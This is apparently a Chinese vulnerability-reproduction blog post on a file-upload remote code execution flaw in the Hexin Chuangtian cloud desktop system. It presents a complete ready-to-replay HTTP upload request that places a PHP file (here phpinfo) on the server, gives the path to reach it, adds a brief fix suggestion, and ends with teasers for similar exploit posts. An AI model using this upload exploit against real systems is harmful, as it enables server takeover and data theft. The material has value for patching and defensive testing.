和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试
前言
和信创天云桌面系统,官方介绍,市场上主要有华为、深信服、锐捷、和信创天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三家厂商的云桌面产品多以传统VDI架构为主,和信创天的下一代云桌面能够融合VDI、VOI和IDV三大架构。
漏洞影响:和信创天云桌面系统
漏洞复现
poc
POST /Upload/upload_file.php?l=1 HTTP/1.1
Host: 127.0.0.1:2001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://127.0.0.1:2001/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 182------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/avif<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--
可以直接使用HackBar进行重放
然后访问路径 ````/Upload/“. l . ” / “ . l.”/“. l.”/“._FILES[“file”][“name”]```
本例则为 /Upload/1/test.php
修复建议
修改upload_file.php 限制文件上传类型
注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
欢迎讨论,持续更新中,感谢关注!
和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试相关推荐
- 和信创天云桌面系统远程命令执行
若天下不定,吾往:若世道不平,不回! 漏洞描述 和信创天云桌面系统存在默认配置导致文件上传并可以远程命令执行 漏洞影响 和信创天云桌面系统 漏洞复现 构造payload POST /Upload/u ...
- 和信创天云桌面系统VENGD文件上传漏洞复现
1.漏洞概述 和信创天下一代云桌面系统融合了VDI.VOI.IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理.安全.运维 ...
- 【漏洞复现】和信创天云桌面系统—任意文件上传
简介 和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计 ...
- 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执 ...
- 【漏洞预警】Redis 4.x/5.x 远程命令执行高危漏洞修复
Redis 4.x/5.x 远程命令执行高危漏洞修复 漏洞背景 漏洞描述 影响版本(Redis 4.x.Redis 5.x) 安全建议 一.通过阿里云安全组禁止Redis端口对外或只允许特定安全ip地 ...
- war包启动命令_【漏洞预警】Oracle WebLogic远程命令执行0day漏洞(CVE20192725补丁绕过)...
概述 近日,奇安信天眼与安服团队通过数据监控发现,野外出现Oracle WebLogic远程命令执行漏洞最新利用代码,此攻击利用绕过了厂商今年4月底所发布的最新安全补丁(CVE-2019-2725). ...
- PHP-JAVA-Python-JavaScript框架介绍CVE-2018-1002015/CNVD-2018-24942/2x-rce/Spring命令执行/CVE-2021_21234漏洞复现
框架 假如我们要买一台电脑.框架为我们提供了已经装好的电脑,我们只要买回来就能用, 但你必须把整个电脑买回来.这样用户用起来自然轻松许多,但是我们这电脑没有软件其他,会导致很多人用一样的电脑,太死板了 ...
- 远程代码执行(RCE)漏洞
文章目录 1. fastjson 远程代码执行漏洞 2. 简单复现 3. 反弹shell 3.1 正向反弹shell 3.2 反向反弹shell 1. fastjson 远程代码执行漏洞 最近读到一篇 ...
- thinkphp lang命令执行(QVD-2022-46174)漏洞复现
漏洞简介: ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架.当特定版本的ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实 ...
最新文章
- JSON.stringify报cyclic object value错误
- Linux kernel内核调用crypto算法的方法
- JZOJ 5982. 【WC2019模拟12.27】路径排序
- Swagger-概述
- 同样的sql在两个oracle,sql – 从两个会话INSERT到唯一列相同的值(Oracle)
- C++中的指针与引用
- java 模块化osgi_OSGi简介–模块化Java
- 零基础学习IOS开发(二)- 使用cocos2d-x3.0 执行Hello world
- 30个常用python实现
- 算法 python实现(一) 基本常识
- 做好以下四点,拒做 “ 空心 ” 程序员 | CSDN 博文精选
- 实验2-4-6 求幂之和 (C语言)
- 网管,真的是我该选择的路吗?
- 用 Python 的 selenium扩展 驱动 火狐 谷歌 浏览器
- 数学:给你长度1~n的线段 组成三角形最长边长度不超过你的n三角形有多少个
- Linux 中 17 个 tar 命令实用示例
- python爬虫代理ip
- 洛谷 P3324 [SDOI2015]星际战争 二分答案+网络流
- 微信公众平台测试号验证Token失败的坑
- rsync+inotify-tools和rsync+sersync实战应用的区别